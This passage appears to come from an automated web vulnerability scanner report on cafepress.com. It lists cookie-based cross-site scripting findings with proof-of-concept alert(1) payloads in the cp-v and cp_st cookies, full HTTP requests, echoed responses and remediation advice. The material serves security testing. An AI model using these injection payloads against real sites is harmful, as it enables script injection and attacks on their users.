GET /cp/viewcart.aspx?s=search HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 51172 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:46:51 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Content-Length: 51172 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.95. http://www.cafepress.com/cp/viewcart.aspx [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/viewcart.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 197e0</script><script>alert(1)</script>ccc939a9ef5 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/viewcart.aspx?s=search HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=197e0</script><script>alert(1)</script>ccc939a9ef5 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 51195 Date: Sun, 26 Dec 2010 13:46:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:46:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Content-Length: 51195 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... afepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/viewcart.aspx' window.cafepress.tealeaf.searchTerm = '197e0</script><script>alert(1)</script>ccc939a9ef5 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.96. http://www.cafepress.com/make/birth-announcements [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/birth-announcements
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1c6c"-alert(1)-"3104c288fc9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/birth-announcements HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc1c6c"-alert(1)-"3104c288fc9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 54488 Date: Sun, 26 Dec 2010 13:48:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54488 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc1c6c"-alert(1)-"3104c288fc9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.97. http://www.cafepress.com/make/birth-announcements [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/birth-announcements
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b100</script><script>alert(1)</script>01efe3e9555 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/birth-announcements HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=7b100</script><script>alert(1)</script>01efe3e9555 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 54510 Date: Sun, 26 Dec 2010 13:48:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54510 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '7b100</script><script>alert(1)</script>01efe3e9555 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.98. http://www.cafepress.com/make/custom-baby-gear [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-baby-gear
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505c2"-alert(1)-"362de5625b3 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-baby-gear HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA505c2"-alert(1)-"362de5625b3 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 71179 Date: Sun, 26 Dec 2010 13:48:28 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA505c2"-alert(1)-"362de5625b3 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.99. http://www.cafepress.com/make/custom-baby-gear [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-baby-gear
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8caa8</script><script>alert(1)</script>49b69bc8c1b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-baby-gear HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=8caa8</script><script>alert(1)</script>49b69bc8c1b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; 